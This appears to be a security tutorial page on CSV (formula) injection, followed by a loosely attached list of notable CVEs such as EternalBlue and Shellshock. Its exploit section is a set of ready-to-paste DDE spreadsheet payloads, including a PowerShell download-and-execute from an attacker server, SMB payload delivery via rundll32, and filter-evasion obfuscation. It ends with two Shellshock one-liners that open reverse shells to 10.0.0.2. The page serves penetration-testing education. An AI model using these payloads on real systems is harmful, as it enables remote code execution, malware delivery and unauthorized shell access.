CSV Injection, also known as formula injection, occurs when a malicious actor is able to inject a formula or malicious code into a CSV file, which can then be executed when the file is opened in a spreadsheet program like Microsoft Excel or Google Sheets. This can happen when an application that generates CSV files does not properly validate user input before inserting it into the file.

For example, imagine an online store that has a feature that allows customers to download their purchase history as a CSV file. If the application does not properly validate user input, an attacker could submit a customer name like “=SUM(A1:A10)” as a name which when a user opens the file, the formula will be executed on the spreadsheet and the sum of A1:A10 cells will be returned and it can also lead to stealing sensitive data.

To prevent CSV injection attacks, it is important to properly validate user input and sanitize any data that will be included in a CSV file before it is generated. Additionally, spreadsheet software should be configured to prompt the user before executing any formulas or macros when opening a file.

Exploit

Basic exploit with Dynamic Data Exchange

# pop a calc
DDE ("cmd";"/C calc";"!A0")A0
@SUM(1+1)*cmd|' /C calc'!A0
=2+5+cmd|' /C calc'!A0

# pop a notepad
=cmd|' /C notepad'!'A1'

# powershell download and execute
=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0

# msf smb delivery with rundll32
=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1

# Prefix obfuscation and command chaining
=AAAA+BBBB-CCCC&"Hello"/12345&cmd|'/c calc.exe'!A
=cmd|'/c calc.exe'!A*cmd|'/c calc.exe'!A
+thespanishinquisition(cmd|'/c calc.exe'!A
=         cmd|'/c calc.exe'!A

# Using rundll32 instead of cmd
=rundll32|'URL.dll,OpenURL calc.exe'!A
=rundll321234567890abcdefghijklmnopqrstuvwxyz|'URL.dll,OpenURL calc.exe'!A

# Using null characters to bypass dictionary filters. Since they are not spaces, they are ignored when executed.
=    C    m D                    |        '/        c       c  al  c      .  e                  x       e  '   !   A

Technical Details of the above payload:

• cmd is the name the server can respond to whenever a client is trying to access the server
• /C calc is the file name which in our case is the calc(i.e the calc.exe)
• !A0 is the item name that specifies the unit of data that a server can respond to when the client is requesting the data

Any formula can be started with

=
+
–
@

Common Vulnerabilities and Exposures

Tools

There are several tools that can be used to find and prevent CSV injection vulnerabilities:

1. Web Application Scanners: Tools such as OWASP ZAP, Nessus, and Burp Suite can scan web applications for various types of vulnerabilities, including CSV injection.

2. SAST(Static Application Security Testing) Tools: These tools analyze the source code of an application to identify vulnerabilities, including CSV injection. Examples include Fortify, Veracode, and Checkmarx.

3. DAST (Dynamic Application Security Testing) Tools: These tools perform tests on a live application to identify vulnerabilities, including CSV injection. Examples include OWASP ZAP, Nessus, and Burp Suite.

4. Manual testing: Manually testing an application for CSV injection vulnerabilities can also be effective. This may include testing input fields for injecting malicious formulas, and testing if the application properly sanitizes user input.

It is important to keep in mind that no single tool can provide complete coverage, and a combination of tools and manual testing is often necessary to identify all potential vulnerabilities.

Big CVEs in the last 5 years.

CVE-2017-0144 – EternalBlue

EternalBlue exploits a vulnerability in Microsoft’s implementation of the Server Message Block (SMB) protocol. The vulnerability exists because the SMB version 1 (SMBv1) server in various versions of Microsoft Windows mishandles specially crafted packets from remote attackers, allowing them to execute arbitrary code on the target computer.

Affected systems: – Windows Vista SP2 – Windows Server 2008 SP2 and R2 SP1 – Windows 7 SP1 – Windows 8.1 – Windows Server 2012 Gold and R2 – Windows RT 8.1 – Windows 10 Gold, 1511, and 1607 – Windows Server 2016

CVE-2017-5638 – Apache Struts 2

On March 6th, a new remote code execution (RCE) vulnerability in Apache Struts 2 was made public. This recent vulnerability, CVE-2017-5638, allows a remote attacker to inject operating system commands into a web application through the “Content-Type” header.

CVE-2018-7600 – Drupalgeddon 2

A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised.

CVE-2019-0708 – BlueKeep

A remote code execution vulnerability exists in Remote Desktop Services – formerly known as Terminal Services – when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. This vulnerability is pre-authentication and requires no user interaction. An attacker who successfully exploited this vulnerability could execute arbitrary code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

CVE-2019-19781 – Citrix ADC Netscaler

A remote code execution vulnerability in Citrix Application Delivery Controller (ADC) formerly known as NetScaler ADC and Citrix Gateway formerly known as NetScaler Gateway that, if exploited, could allow an unauthenticated attacker to perform arbitrary code execution.

Affected products: – Citrix ADC and Citrix Gateway version 13.0 all supported builds – Citrix ADC and NetScaler Gateway version 12.1 all supported builds – Citrix ADC and NetScaler Gateway version 12.0 all supported builds – Citrix ADC and NetScaler Gateway version 11.1 all supported builds – Citrix NetScaler ADC and NetScaler Gateway version 10.5 all supported builds

Older, but not forgotten

CVE-2014-0160 – Heartbleed

The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. This weakness allows stealing the information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet. SSL/TLS provides communication security and privacy over the Internet for applications such as web, email, instant messaging (IM) and some virtual private networks (VPNs).

CVE-2014-6271 – Shellshock

Shellshock, also known as Bashdoor is a family of a security bug in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014. Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system.

echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 10.0.0.2 4444 -e /bin/sh\r\n"
curl --silent -k -H "User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.0.0.2/4444 0>&1" "https://10.0.0.1/cgi-bin/admin.cgi"